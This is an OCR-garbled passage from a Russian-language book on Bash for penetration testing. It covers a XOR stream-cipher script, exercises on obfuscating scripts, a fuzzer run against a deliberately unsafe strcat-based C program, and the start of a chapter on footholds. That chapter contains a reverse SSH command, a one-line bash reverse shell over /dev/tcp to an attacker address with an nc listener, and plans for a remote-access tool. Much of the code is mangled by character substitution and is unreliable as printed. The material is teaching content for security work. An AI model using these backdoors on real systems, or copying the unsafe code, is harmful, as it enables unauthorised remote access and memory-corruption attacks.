ХОК 

Зашифрованный текст (шестнадцатеричный) с9 44 9а Ь6 


Если при расшифровке текста, зашифрованного методом ХОК, будет использо- 
ван тот же ключ (последовательность случайных чисел), который применялся 
для шифрования, мы получим расшифрованный исходный текст. Каки АЕ, этот 
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метод считается алгоритмом симметричного ключа. В табл. 14.2 показано, как ис- 
пользовать метод ХОК для расшифровки зашифрованного текста. 


Таблица 14.2. Пример расшифровки 


Шифртекст (шестнадцатеричный) с9 44 Эа Ьб 
Ключ (шестнадцатеричный) ас 27 р а9 
ХОК 

АЗСП (шестнадцатеричный) 65 63 68 6ғ 
Обычный текст е с ћ о 


Чтобы текст был правильно расшифрован, вам нужно иметь тот же ключ, который 
использовался для шифрования. Это можно сделать, используя для генератора 
случайных чисел одно и то же начальное значение. Если вы запускаете тот же 
генератор случайных чисел, используя одно и то же начальное значение, на вы- 
ходе вы должны получить ту же последовательность случайных чисел. Обратите 
внимание, что безопасность данного метода сильно зависит от качества генера- 
тора случайных чисел, который вы используете. Кроме того, вы должны выбрать 
большое начальное значение и для шифрования каждого сценария указывать 
разные значения. 


Вот пример того, как вы можете запустить этот сценарий. В качестве аргумента 
указывается ключ шифрования — в данном случае 25624. Входные данные — это 
одна фраза, представляющая команду Глпих ипапе -а, а вывод, то есть зашифро- 
ванная фраза — это неразрывная последовательность шестнадцатеричных цифр: 


$ Базп ѕ+геатсірһег.ѕһ 25624 


ипате -а 
502С183566045822 
$ 


Для проверки вы можете расшифровать зашифрованный результат и сравнить 
с оригинальным текстом: 


$ БазИ $+геатс1рНег.$Н 25624 | БазН $4геашс1рНег.$Н -4 25624 


ипате -а 
ипате -а 
$ 


Первая фраза ипате -а — это ввод в сценарий шифрования; вторая — вывод после 
расшифровки. То есть все сработало правильно! 
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Сценарий, приведенный в примере 14.7, считывает указанный файл, а затем с по- 
мощью метода ХОК и ключа, предоставленного пользователем, шифрует или рас- 
шифровывает его. 


Пример 14.7. $геатарпег.5Н 
#!/61п/Ба$й - 


# 
# Ваѕһ и кибербезопасность 
# ѕїігеатсірһег.ѕһ 
# 
# Описание: 
# Облегченная реализация потокового шифра 
# Это учебный пример, который не рекомендуется для практического применения 
# 
# Использование: 
# ЅЕгеатсірһег.ѕһ [-4] <Кеу> < іпри++і1е 
# -а Режим дешифрования 
#  <Кеу> Числовой ключ 
# 
# 
зоигсе ./азКеу. ѕһ о 
# 
# М№сгур - шифрование — считывание символов 
# на выходе двухзначный шестнадцатеричный #5 
# 
Ғипсёіоп М№сгурё () ө 
{ 
ТХТ="$1" 
Фог((1=0; 1< ${#тхт}; 1++)) © 
до 
СНАВ="${ТХТ:1:1}" [4] 
КАМ=$ (аѕпит "ФСНАК") # " " требуется для пробелов (32) Ө 
МОМ=${ КАМООМ} 
С00=$(( ВАМ ^ ( №М & @х7Е ))) [6] 
рг1и Еф "#%02Х" "$СОор" [7] 
допе 
есһо [8] 
} 
# 
# Осгурё - дешифрование — считывание двухзначного шестнадцатеричного #5 
# на выходе символы (буквенные и цифровые) 
# 


Ғипсёіоп Осгурё () [9] 
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ТХТ="$1" 
Ғог((1=0; 1< ${#ТХТ}; 1=1+2)) 
ао 
СНАВ="@х${ТХТ:1:2}" 
КАМ=$(( ФСНАК )) 
МОМ=${ КАМООМ} 
С00=$(( КАМ ^ ( ММ & Өх7Е ))) 
аѕсһаг "$С00" 
аопе 
есһо 


ое ӨӨ ө 


} 


1 [[ -п $1 && $1 == "-а" ]] Ф 
{Реп 

рЕСКҮРТ= "ҮЕЅ" 

ЅһіҒЕ Ф 
+1 


КЕУ=${1:-1776} 
КАМООМ="${КЕҮ}" 
мһі1е геаа -г 
о 
14 [[ -2 ФОЕСВУРТ ]] 
{Кеп 
№сгуре "$КЕРІҮ" 
е1ѕе 
Бсгуре "$КЕРІҮ" 


ө өөө 


+1 
аопе 


© В указанном файле считывается оператор зоигсе, который становится частью 
сценария. В данном случае он содержит определения двух функций, таких как 
аѕпит и аѕсһаг, которые позже будут использованы в коде. 


Ө Функция №сгурё принимает строку текста в качестве своего первого (и един- 
ственного) аргумента и шифрует каждый символ, распечатывая зашифрованную 
строку. 


Ө Это цикл, определяющий длину строки. 
Ө Принимается первый символ. 


Ө Когда мы ссылаемся на данную строку с одним символом, а символ оказывается 
пробелом (АЅСП 32), который игнорируется оболочкой, мы помещаем эту строку 
в кавычки. 


Ө Внутри двойных скобок, как и в любом другом месте сценария, символ $ 
перед именами переменных не нужен. Переменная КАМООМ — это специальная 
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переменная оболочки, которая возвращает случайное (целое) число в диапазоне 
от 0 до 16 383 (ЗЕЕЕ). Здесь, чтобы очистить все, кроме последних 7 бит, исполь- 
зуется поразрядный оператор апа. 


Ө Мы печатаем новое закодированное значение в виде двухзначного шестнадца- 
теричного числа с нулевым заполнением. 


Ө Оператор есһо печатает новую строку в конце строки шестнадцатеричных цифр. 
© Для расшифровки будет вызвана функция ресгурї. 


© Ввод для расшифровки — шестнадцатеричные цифры, поэтому одновременно 
мы берем два символа. 


Ф Мы строим подстроку с литералом өх, за которым следует двухсимвольная под- 
строка входного текста. 


Ф Задав шестнадцатеричную цифру в формате, который понимает Баѕћ, мы можем 
рассматривать ее как математическое выражение (используя символы АоПаг- 
ЧочЫе-рагеп$), после чего БазВ вернет ее значение. Вы могли бы написать это вы- 
ражение следующим образом: 


$(( $СНАК + Ө )) 


® Используемый нами алгоритм кодирования/декодирования один и тот же. 
Мы берем случайное число и сопоставляем (ехс1и$1\уе-ог) его с нашим вводом. 
Последовательность случайных чисел должна быть такой же, как и при шифрова- 
нии нашего сообщения, поэтому нам нужно использовать такое же значение, как 
и при шифровании. 


Ф Функция аѕсһаг преобразует числовое значение в символ АЗСП и выводит его 
(помните, что это пользовательская функция, а не Баѕћ). 


Ф Параметр (-п) запрашивает значение аргумента. Если оно не равно нулю, 
выполняется проверка, соотносится ли параметр -а с тем сообщением, которое 
мы хотим расшифровать (а не зашифровать). Если результат положительный 
(то есть параметр -4 соотносится с сообщением), тогда устанавливается флаг 
для проверки. 


Ф Этот параметр -а отбрасывается командой $11, потому что первым аргументом 
($1) становится следующий аргумент (если он есть). 


Ф Ключу переменной присваивается первый аргумент (если таковой имеется). 
Если аргумент не указан, в качестве значения по умолчанию мы будем использо- 
вать 1776. 
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Ф Присваивая значение ВАМООМ, мы устанавливаем начальное значение для после- 
довательности (псевдо-) случайных чисел, которые будут получены при каждой 
ссылке на переменную. 


Ф Параметр -г в команде геаа отключает специальное значение обратного слеша. 
Таким образом, если в нашем тексте встречается обратный слеш, он просто вос- 
принимается как обратная косая черта, ничем не отличающаяся от любого другого 
символа. Нам нужно сохранить читаемые нами начальные (и конечные) пробелы 
в строках. Если в команде геад мы зададим одно или несколько имен переменных, 
оболочка попытается разобрать входные данные на слова, чтобы назначить их 
указанным переменным. Если имена переменных не будут заданы, входные дан- 
ные сохранятся во встроенном ответе переменной оболочки. Здесь самое главное 
заключается в том, что строка не будет анализироваться. Поэтому начальные и ко- 
нечные пробелы сохраняются (кроме того, вы можете указать имя переменной, но 
это следует сделать перед чтением с ІЕ5="", чтобы отменить любой разбор на слова 
и сохранить пробелы). 


® Оператор 1+ проверяет, установлен ли флаг (если переменная содержит значе- 
ние), чтобы решить, какую функцию вызывать: ресгурї или №сгур*. В любом слу- 
чае, чтобы сохранить всю строку в качестве одного аргумента, а также сохранить 
любые пробелы в строке текста (действительно необходимые только для случая 
№сгур+), оператор 1+ передает только что прочитанную из $4 т строку, помещая 
ее в кавычки. 


Первая строка ѕ&геатсірһег.ѕћһ использует значение зоигсе для включения внеш- 
него кода из файла аѕкеу. п. Этот файл, как показано в примере 14.8, содержит 
функции азсваг и аѕпип. 


Пример 14.8. аѕкеу.ѕћ 


# функции для преобразования десятичных чисел в АЅ5СІІ и наоборот 


# азспаг — печать представления символов аѕсіі 


# числа, переданного в качестве аргумента 
# ехатр1е: аѕсһағг 65 ==> А 

# 

ФипсЕ1оп аѕсһаг () 

{ 


1оса1 аѕһех © 
рг1пЕ+Р -у аѕһех '\\х%02х' $1 ө 
рг1и{+ '%6' фаѕһех © 


# аѕпит — печатать аѕсіі (десятичное) значение символа, 
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# переданного в качестве значения $1 
# пример: аѕпит А ==> 65 
# 
ФипсЕ1оп аѕпит () 
{ 
ргіпЕ '%а' "\"%1" [4] 
} 


Здесь используются две малопонятные команды ргіп++, по одной для каждой 
функции. 


© Чтобы не связываться с любыми переменными в сценарии, который может быть 
источником этого файла, начинаем с локальной переменной. 


Ө Этот вызов ргіпё# принимает параметр функции ($1) и выводит его как шест- 
надцатеричное значение в формате \х, где двухзначное шестнадцатеричное число 
имеет нулевое заполнение. Первые два символа, обратный слеш и х необходимы 
для следующего вызова. Но эта строка в $401 не печатается. Параметр -у указывает 
ргіпе# хранить результат в заданной переменной оболочки (мы указали азПех). 


Ө Теперь берем строку в аѕһех и распечатываем ее, используя формат %5. Этот фор- 
мат указывает ргіпё печатать аргумент как строку, но интерпретировать любые 
найденные в строке езсаре-последовательности. Обычно езсаре-последовательности 
(например, \\п для новой строки) отображаются только в строке формата. Если они 
появляются в аргументе, то рассматриваются как простые символы. Но исполь- 
зование формата %6 указывает ргіпё+ интерпретировать эти последовательности 
в параметре. Например, первая и третья инструкции ргіпё# здесь печатают новую 
строку (пустую строку), тогда как вторая инструкция будет печатать только два 
обратных слеша и п: 

ріп "\п" 

ретиЕЕ "#5" "\п" 

ретипЕЕ "6" "\п" 


Используемая для функции азспаг еѕсаре-последовательность принимает шест- 
надцатеричное число, обозначаемое обратным слешем (\х) и двузначным шестнад- 
цатеричным значением, и выводит символ АЅСП, соответствующий этому числу. 
Вот поэтому мы взяли переданное в функцию десятичное число и напечатали его 
в переменной аѕћех в формате этой езсаре-последовательности. В результате мы 
получим символ АЅСП. 


Ө Преобразовать символ в число проще. С помощью функции ргіпї мы выво- 
дим символ в виде десятичного числа. Функция ргіпё# обычно выдает ошибку, 
если мы пытаемся напечатать строку в виде числа. Добавив обратный слеш, мы 
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экранировали это число, чтобы сообщить оболочке, что нам нужен сам символ об- 
ратного слеша, потому что это не начало заключенной в кавычки строки. Что это 
нам дает? Вот что о команде рг1п+ говорит стандарт РОЅІХ. 


Если начальный символ является одинарной или двойной кавычкой, значение 
в базовом наборе кодов символа должно быть числовым значением, следу- 
ющим за одинарной или двойной кавычкой. ТНе Ореп Сгоир Ваѕе Ѕресійсаіопѕ 
155ие 7, 2018 ейїйоп ІЕЕЕ 5а 1003.1-2017 (Веміѕіоп о ТЕЕЕ 5а 1003.1-2008) (һір:// 
Ыіу/2СКуТаВ). Соругідћё © 2001—2018 ІЕЕЕ апа Тһе Ореп Сгочр. 


Файл аѕкеу.ѕһ предоставляет нам две функции: аѕпити аѕсһаг, с помощью которых 
вы можете конвертировать данные в символы АЗСП и обратно в целочисленные 
значения. Эти функции могут быть полезными и в других сценариях, поэтому 
мы акцентировали на них внимание, а не просто определили часть сценария 
ѕ+геатсірһег. ѕһ. В других сценариях их можно использовать как отдельные 


функции. 


Выводы 


Шифрование содержимого сценария — важный шаг, обеспечивающий секретность 
во время теста на проникновение. Чем более сложные методы вы используете, тем 
сложнее злоумышленнику будет провести анализ вашего набора инструментов. 


В следующей главе мы рассмотрим, как, создав #177ег, определить возможные уяз- 
вимости в сценариях и исполняемых файлах. 


Упражнения 


1. Просмотрите еще раз сценарий ѕёгеатсірћег. $! и подумайте: если при ши- 
фровании вы выводите не шестнадцатеричное число, а представленный этим 
шестнадцатеричным числом символ АЗСП, будет ли в выводе каждому символу 
ввода соответствовать один символ? Для сценария вам нужен отдельный вари- 
ант декодирования или вы можете просто запустить тот же алгоритм? Измените 
код, чтобы сделать это. 


В этом подходе есть основной недостаток, который не касается алгоритма 
шифрования. Подумайте о том, что это за недостаток и что и по какой причине 
не сработает. 
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2. Используя описанные ранее методы, запутайте следующий сценарий, чтобы 
затруднить его выполнение: 


#!/б1п/Ба$й - 


Фог агвѕ до 
есһо $агеѕ 
опе 
3. Зашифруйте предыдущий сценарий и создайте оболочку с помощью Ореп$ ТГ. 
или ѕ&геатсірһег. $П. 


4. Напишите скрипт, который считывает файл сценария и выводит его запутанную 


версию. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ћірѕ://Лум.гарійсубегорѕ.соту/. 


Инструмент: 
Ри22ег 


Фаззинг (Ќизліпв) — это метод, применяющийся для выявления возможных уязви- 
мостей в исполняемых файлах, протоколах и системах. Он особенно полезен при 
идентификации приложений, в которых проверка пользовательского ввода не вы- 
полняется или выполняется некачественно, а это, в свою очередь, может привести 
к такой уязвимости, как переполнение буфера. Ваѕћ идеально подходит для провер- 
ки методом фаззинга программ, которые принимают аргументы и запускаются из 
командной строки. Это объясняется тем, что запуск программ в оболочке является 
основной задачей БазВ. 


В этой главе мы создадим инструмент Фих2ег. ѕһ, который видоизменяет (Ё177е$) 
аргументы командной строки исполняемого файла. Другими словами, он будет 
запускать исполняемый файл снова и снова, каждый раз увеличивая длину од- 
ного из аргументов на один символ. Далее перечислены требования к данному 
инструменту. 


О Аргумент, который должен быть изменен, обозначается вопросительным зна- 
ком (?). 


О Измененный аргумент начинается с одного символа, и при каждом выполне- 
нии целевой программы к нему будет добавляться еще один дополнительный 
символ. 


О Еч77ег остановится после того, как длина аргумента составит 10 000 символов. 


О При аварийном завершении работы программы Ё127ег без искажений выведет 
вызвавшую сбой команду и любые выходные данные программы, включая 
ошибки. 


Например, если вы хотите использовать Фи22ег.5| для видоизменения второго 
аргумента Фит2те.ехе, сделайте это следующим образом: 


./#и22ег.ѕһ Ғиг2те.ехе аг51 ? 
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Как говорилось раньше, аргумент, который вы хотите изменить, обозначается зна- 
ком вопроса (?). Еих2ег. зН будет выполнять программу +и22те.ехе снова и снова, 
каждый раз добавляя ко второму аргументу еще один символ. Если это делать вруч- 
ную, вы увидите следующее: 


$ Ғиггте.ехе агр1 а 

$ Ғиггте.ехе агр1 аа 

$ Ғиггте.ехе агр1 ааа 

$ Ғиггте.ехе агр1 аааа 
$ Ғигтте.ехе аге1 ааааа 


Реализация 


В качестве целевого приложения используется программа +и72те .ехе. Мы возьмем 
два аргумента командной строки, объединим их и выведем объединенную строку 
на экран. Вот пример выполнения программы: 


$ ./Ғиггте.ехе 'һіѕ 15' 'а Теѕї' 
Тһе {мо агритепѕ сотріпеа 15: 401$ 15 а тез 


Пример 15.1 предоставляет исходный код для Ғиғуте. ехе, написанный на языке С. 


Пример 15.1. ѓиг2те.с 


#1іпс1иде <5+аіо.һ> 
#1іпс1иде <51гіпе.һ> 


// Внимание: эта программа не безопасна и предназначена 
// только для демонстрации 


іп таіп(іпі агес, сһаг *агеу[]) 


{ 


сһаг сотбіпеа[50] = ""; 

ѕЕгрсаї(сотріпеа, агру[1]); 

ѕ0гсаї(сотріпеа, " "); 

ЅЕгсаї(сотріпеа, агру[2]); 

ргіп#( "Тһе Елмо агеитепёѕ сотріпеа 15: %$\п", сотбіпеа); 


геёигп(0); 


} 


Программа использует функцию ѕёгса+ (), которая, по своей сути, небезопасна 
и может привести к переполнению буфера. Кроме того, она не выполняет проверку 
ввода из командной строки. 
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ЅТКСАТ 


Почему же функция С ѕгсаї может переполнить буфер? Поскольку ѕёгсаё копи- 
рует одну строку (источник) в конец другой строки (назначение), функция не знает, 
какой объем памяти доступен в месте назначения. Независимо от того, сколько байт 
находится или сколько места доступно в месте назначения, функция копирует из 
источника байт за байтом до тех пор, пока не столкнется с нулевым байтом. В резуль- 
тате ѕ%гса может скопировать в место назначения слишком много данных и пере- 
записать другие разделы памяти. Опытный злоумышленник может воспользоваться 
этим свойством функции для внедрения в память вредоносного кода, который впо- 
следствии будет выполняться компьютером. 


Более безопасной функцией является $4гпса*, требующая от вас указать параметр, 
который ограничивает количество копируемых байтов. В этом случае вы будете 
знать, что в строке назначения останется достаточно места. 


Полное объяснение механизма переполнения буфера выходит за рамки этой книги, 
но мы вам настоятельно рекомендуем прочитать статью 5таѕћіпе Тйе 5васЁ от Рип 
апа Ргоўії (Һёр://ЫёЛу/2ТАім1Р). 


В примере 15.1 переменная сотбіпей[] имеет максимальную длину 50 байт. 
Вот что происходит, если комбинация двух аргументов программы слишком ве- 
лика для хранения в переменной: 


$ ./Ғиг2те.ехе аг51 ааааааааааааааааааааааааааааааааааааааааааааааааааааааа 
ааааааааааааааааааааааааааааааааааааааааааа 


Тһе Емо агритепѕ сотЬ1пе 15: агё1 ааааааааааааааааааааааааааааааааааааааа 
ааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа 
Ѕертепта+іоп Ғаи1+ (соге аитреа) (Ошибка сегментации (сбросить ядро)) 


Как вы можете видеть, данные переполнили пространство, выделенное в памяти 
для сотріпеа[], и вызвали сбой программы из-за ошибки сегментации. Факт сбоя 
программы означает, что она не выполняет нормальную проверку ввода и может 
быть уязвима для атаки. 


Метод Фи72ег предназначен для автоматизации процесса идентификации областей 
целевой программы, выходящих из строя из-за недопустимого ввода. 


Реализация этого метода показана в примере 15.2. 


Пример 15.2. Ги77ег.5И 


#1/ріп/баѕћ - 
# 
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# Ваѕһ и кибербезопасность 
# Ғи22ег.ѕһ 
# 
# Описание: 
# Изменение указанного аргумента программы 
# 
# Использование: 
# БазН Фиххег.$И <ехесиар1е» ‹аг21> [?] <агез> ... 
# <ехеситаб1е> Целевая исполняемая программа/скрипт 
# ‹агрп> Статические аргументы для исполняемого файла 
# '?' Аргумент, который должен быть изменен 
# пример: Фиххег.$Н ./тургов - '?' Еп1 #п2 
# 
# 
Ғипсёїіоп иѕавехії () © 
{ 
есһо "иѕаре: $0 ехесифаб1е аг8$" 
есһо "ехатр1е: $0 туарр -1рЕ агр \?" 
ехії 1 
} >82 ө 
1+ ((Ф# < 2)) © 
Неп 
иѕарехії 
Ғі 


# приложение, которое мы будем изменять, — это первый аргумент 
ТНЕАРР="$1" 


ЅҺіҒЕ ө 
# действительно здесь? 
Журе -+ "ФТНЕАРР" >/аеу/пи11 || иѕарехі+ 5] 


# какой аргумент нужно изменять? 
# найти ? и пометить его позицию 
ес1аге -1 1 


Ғог ((1=0; $# ; 1++)) [6] 
ао 
АШІЅТ+=( "$1" ) ө 
ЇР [[ $1 == '?' ]] 
ёһеп 
№ОХ=$1 ө 
1 
УВЕ 
аопе 


# ргіпЕ? "Ехеси+ар1е: %$ Агр: %4 %$\п" "$ТНЕАРР" $МОХ "%{АГІЅТ[$М№0Х]}" 


# теперь изменить: 
МАХ=10000 
ЕО20М№Е= "а" 
РО7АКС="" 


230 Часть ПТ • Тестирование на проникновение 


Фог ((1=1; 1 <= МАХ; 1++)) [9] 
ао 
ЕО2АКб= "${ ЕОХАКС }${ ЕО2ОМЕ}" # то есть += 
АШІЅТ[$№0Х]="ЕО2АКС" 
# порядок >ѕ важен 
$ТНЕАРР "${АГІЅТ[@]}" 2>&1 >/аеу/пи11 По] 
1+ (( Ф2 )) ; +һеп есһо "Саизеа Бу: ФЕ02АКС" >82 ; #і Ф 
опе 


© Мы определяем функцию иѕавехі+, чтобы выдать пользователю сообщение об 
ошибке, которая укажет правильный способ использования сценария. После печати 
сообщения сценарий завершит работу и будет вызван при ошибочной активации 
(в нашем случае, если аргументов станет недостаточно) (см. Ө). Аргумент -1р+ 
в примере сообщения является аргументом для пользовательской программы 
туарр, а не для сценария #их7ег. $ћ. 


Ө Поскольку эта функция выдает сообщение об ошибке, а не предполагаемый 
вывод программы, мы хотим, чтобы сообщение перешло в $(аегг. После этого весь 
вывод из функции, который был направлен в ѕйоиќ, перенаправляется в ѕбӣегг. 


© Если аргументов недостаточно, следует завершить работу сценария; мы вызы- 
ваем эту функцию, чтобы объяснить пользователю, как ее правильно использовать 
(функция выйдет из сценария и не возвратится). 


Ө Сохранив в приложении первый аргумент, мы смещаем аргументы. Таким об- 
разом, $2 становится $1, $3 становится $2 ит. д. 


© Тип встроенного приложения определяет тип исполняемого файла (псевдоним, 
ключевое слово, функция, встроенный файл). Поскольку вывод нас не интересует, 
мы перенаправляем его в /аеу/пи11 и отбрасываем. Нам необходимо получить 
возвращаемое значение +уре. Если пользовательское приложение (один из пере- 
численных типов) может быть запущено, возвращается значение ө. Если нет — 
возвращается значение 1 и выполняется второе условие этой строки: вызывается 
функция изарех1*, а работа сценария завершается. 


© Этот цикл #ог будет перебирать количество аргументов ($#), хотя это количе- 
ство с каждым сдвигом будет уменьшаться. Данные аргументы предназначены для 
пользовательской программы, то есть программы, к которой мы применяем метод 
фаззинга. 


Ө Мы сохраняем каждый аргумент, добавляя его в переменную массива АЕТЗТ. 
Почему бы нам просто не добавить каждый аргумент в строку, а не хранить их 
как элементы массива? Все будет работать нормально, если ни один из аргумен- 
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тов не содержит пробелов. При сохранении аргументов в виде массива каждый 
аргумент будет сохранен как отдельный элемент; в противном случае оболочка 
использует для разделения аргументов пробелы. 


© При пересмотре аргументов мы ищем литерал ?, которым пользователь пометил 
аргумент, предназначенный для изменения. Найдя его, мы сохраняем индекс для 
последующего использования. 


© В этом цикле мы создаем все более длинные строки для видоизменения (1276$) 
приложения и проверяем, не будет ли достигнут указанный нами максимум 10 000. 
При очередной итерации мы добавляем к ЕО2АКС еще один символ, а затем назнача- 
ем РУРАВб аргументу, который был обозначен пользователем с помощью ?. 


© При вызове команды пользователя следует предоставить список аргументов, 
указывая все элементы массива. Помещая всю эту конструкцию в кавычки, мы 
указываем цитировать каждый аргумент, тем самым сохраняя любые пробелы 
(например, в имени файла Му Е11е). Обратите особое внимание на приведенные 
здесь перенаправления. Сначала мы отправляем $ 4егг по обычному направлению 
в $406, а затем перенаправляем $401 в /деу/пи11. От такого перенаправления мы 
получаем следующий эффект: сообщения об ошибках сохраняются, а нормальный 
вывод отбрасывается. Очень важен порядок этих перенаправлений. Если бы мы 
отменили этот порядок и сначала перенаправили в $401, то все выходные данные 
были бы отброшены. 


Ф Если работа команды завершится неудачно, как указано ненулевым возвра- 
щаемым значением ($2), сценарий отобразит, какое значение аргумента вызвало 
ошибку. Это сообщение направляется в $&4егг, чтобы его можно было вывести 
отдельно от других сообщений. Сообщения об ошибках поступают из программы 
пользователя. 


Выводы 


Фаззинг — очень хороший способ автоматизировать процесс идентификации 
частей программы, в которых отсутствует проверка ввода. В частности, вы ищете 
данные, вызывающие сбой. Обратите внимание: при сбое целевой программы будет 
определена область, требующая дальнейшего исследования. Не обязательно, что 
в этой области будет найдена уязвимость. 


В следующей главе рассматриваются различные способы обеспечения удаленного 
доступа к целевой системе. 
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Упражнения 


1. Если в приложении не предусмотрена надлежащая проверка вводимых данных, 
указание пользователем неправильного типа данных или слишком большой 
размер данных могут привести к сбою приложения. Например, если программа 
ожидает, что аргумент будет числовым, а вместо этого получает буквенный, что 
она будет делать? 


Усовершенствуйте файл Ғихғег. $Н так, чтобы он не только увеличивал длину 
аргумента, но и передавал в случайном порядке аргументы с разными типами 
данных (числа, буквы, специальные символы). Например, Фи2тег. $! может 
выполнить что-то вроде этого: 


$ Ғиггте.ехе агр1 а 

$ Ғиггте.ехе аге1 14 

$ Ғиггте.ехе агр1 &е1 
$ Ғиггте.ехе агр1 1%9м 
$ Ғиггте.ехе аге1 21#$1 


2. Доработайте файл Фи2тег. В таким образом, чтобы он мог одновременно ото- 
бражать несколько аргументов. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://м\м\.гаріасубегорѕ.соту/. 


Создание точки 
опоры 


После получения доступа к целевой системе нужно создать точку опоры. Это дела- 
ется с помощью инструмента удаленного доступа — важного компонента любого 
теста на проникновение. Этот инструмент позволяет удаленно выполнять команды 
в целевой системе. Кроме того, в течение длительного времени он может поддер- 
живать удаленный доступ к целевой системе. 


Используемые команды 


В этой главе мы рассмотрим команду пс для создания сетевых подключений. 


ПС 


Команда пс, также известная как песа, может использоваться для создания 
соединений ТСР и ОПР и прослушивателей. По умолчанию команда доступна 
в большинстве дистрибутивов Глпих, но в СЁ Ваѕћ или Суз\уш она отсутствует. 


Общие параметры команды 


О -1 — прослушивать входящие подключения (действует как сервер). 
О -п — запретить выполнение поиска ОМ$. 


О -р —– задать исходный порт для подключения или прослушивания. 


О -\- установить подробный режим. 
Пример команды 


Для инициализации соединения с О’КеШу.сот и конечным портом 80 можно на- 
писать следующее: 


пс млм. огеі11у.сот 80 
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Прослушивание входящих соединений порта 8080 выполняется таким образом: 
$ пс -1 -\ -п -р 8080 


Ііѕёепіпе оп [апу] 8080 ... 


Бэкдор одной строкой 


Нет лучшего способа замаскироваться во время теста на проникновение, чем ис- 
пользовать для выполнения ваших задач инструменты, существующие в целевой 
системе. Есть несколько способов создания в системе бэкдоров (Баскаоог — «чер- 
ный ход»), и для этого нужна только командная строка и инструменты, которые 
уже доступны в большинстве систем Глпих. Созданные ранее бэкдоры позволят 
поддерживать доступ к целевой системе. 


Обратный $5Н 


Создание обратного $5Н-соединения — это простой и эффективный способ под- 
держания доступа к системе. Настройка обратного 55Н-соединения не требует 
сценариев и может быть выполнена простым запуском одной команды. 


В типичном сетевом соединении клиент — это система, которая инициирует со- 
единение (рис. 16.1). 


Клиент инициирует подключение 
к серверу через ТСР-порт 2 


Цель Атакующий 
(клиент $5Н) (55Н-сервер) 


Рис. 16.1. Нормальное соединение 55Н 


Обратное 55Н-соединение отличается от прямого тем, что $5Н-сервер в конечном 
счете инициирует соединение с клиентом (целью). В этом сценарии целевая систе- 
ма сначала инициирует соединение с атакующей системой. Затем 55Н злоумыш- 
ленника подключается к атакующей системе. Наконец, соединение злоумышлен- 
ника перенаправляется через существующее соединение обратно к цели, создавая 
таким образом обратный сеанс $8Н. 
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> 2. 55Н 
1. Клиент инициирует подключение злоумышленника 

к серверу через ТСР-порт 2 подключается 

к нападающей 

3. Атакующее $5Н системе 
соединение 
Цель перенаправляется к цели Атакующий 
(клиент $5Н) (55Н-сервер) 


Рис. 16.2. Обратное 55Н-соединение 


Настройка обратного $5 Н-соединения в целевой системе: 


55һ -К 12345 :10са110$%:22 иѕег@гетоёеірайӣгеѕ5 


Опция -К включает переадресацию удаленных портов. Первое число, 12345, указывает 
номер порта, который удаленная система (злоумышленник) будет использовать для 
обратного 55Н-соединения с целевой системой. Аргумент 1Іоса1һоѕї :22 определяет но- 
мер порта, который целевая система будет прослушивать, чтобы получить соединение. 


Это, по сути, создает исходящее соединение от целевой системы к серверу ЅЅН, 
что позволит злоумышленнику создать обратное 55Н-соединение с целевой си- 
стемой. Создав такое 55 Н -соединение (от сервера к клиенту), злоумышленник 
сможет удаленно выполнять команды в целевой системе. Поскольку подключение 
было инициировано целевым объектом, оно, скорее всего, не будет ограничиваться 
правилами брандмауэра, находящегося в сети целевого объекта, поскольку пра- 
вила фильтрации исходящего трафика обычно не настолько строгие, как правила 
фильтрации входящего трафика. 


Чтобы создать обратное $55Н-соединение с атакующей системой после подключе- 
ния к цели, можно написать следующее: 


55һ Іоса1һоѕі -р 12345 


Обратите внимание: чтобы завершить подключение к целевой системе, вам нужно 
будет предоставить учетные данные для входа. 


Бэкдор Баѕћ 


Основная функция инструмента удаленного доступа — создание сетевого подклю- 
чения. Как показано в главе 10, БазВ позволяет создавать сетевые подключения с по- 
мощью специальных обработчиков файлов /аеу/&ср и /аеу/ийр. Эту возможность 
также можно использовать для настройки удаленного доступа в целевой системе; 


/Б1п/Ба$И -1 < /аеу/+ср/192.168.10.5/8080 1>&0 2>80 
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Хотя это только одна строка, здесь много чего происходит, поэтому давайте с этим 
разберемся. 


/ріп/баѕћ -1 
Данная строка вызывает новый экземпляр Баѕћ и запускает его в интерактивном 
режиме. 


< /аеу/ср/192.168.10.5/8080 


Это создает ТСР-соединение с системой злоумышленника по адресу 192.168.10.5, 
порт 8080 и перенаправляет его в качестве ввода в новый экземпляр Баѕћ. Замените 
здесь ІР-адрес и порт ІР-адресом и портом системы злоумышленника. 


1>&0 2>80 


Здесь происходит перенаправление стандартного вывода ($406) (файловый де- 
скриптор 1) и стандартного потока ошибок (5 4етг) (дескриптор 2) в стандартный 
ввод ($411) (дескриптор файла 0). В этом случае $ сопоставляется с только что 
созданным ТСР-соединением. 


Важен порядок перенаправления. Сначала нужно открыть сокет, а затем пере- 
направить файловые дескрипторы для использования сокета. 


В системе злоумышленника необходимо иметь список портов сервера, через кото- 
рые можно установить соединение с целью. Для этого вы можете использовать пс: 


$ пс -1 -у -р 8080 
Ііѕёепіпе оп [апу] 80809 


Убедитесь, что вы установили прослушиватель пс на тот же номер порта, который 
планируете указать из бэкдора. При подключении бэкдора может показаться, что 
прослушиватель пс закончил работу, так как вы видите приглашение оболочки. 
На самом деле пс остается открытым, и, кроме этого, создается новая оболочка. 
Все команды, введенные в эту новую оболочку, будут выполняться в удаленной 
системе. 


Однострочный бэкдор Баѕћ прост в обращении и не выполняет никакого ши- 
фрования сетевого подключения. Сетевые защитники или другие программы, 
наблюдающие за соединением, смогут прочитать его как обычный текст. 
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Пользовательский инструмент удаленного доступа 


Несмотря на эффективность однострочного бэкдора, вы можете создать инструмент 
с более гибкими настройками, используя полный сценарий Баѕћ. Ниже приведены 
требования к такому сценарию. 

О Инструмент должен подключаться к указанному серверу и порту. 


о Инструмент получит команду от сервера, выполнит ее в локальной системе 
и выведет все результаты обратно на сервер. 


О Инструмент будет выполнять сценарии, отправленные ему с сервера. 


О Инструмент закроет сетевое соединение, когда получит от сервера команду аи1*. 


На рис. 16.3 показано взаимодействие между средствами удаленного доступа 
в системе злоумышленника (функция Госа1Вае.5П) и инструментом удаленного 
доступа в целевой системе (функция Кетоќека+. $1). 


Атакующая система Целевая система 
(Госа!Ва+. $1) (ВетоїеВаї.ѕһ) 


4 


Инициализация соединения 


Отправить команду (ех.рма) 


Возврат выходных данных (ех./һоте) 


> 


$ выход | 


Завершение соединения 


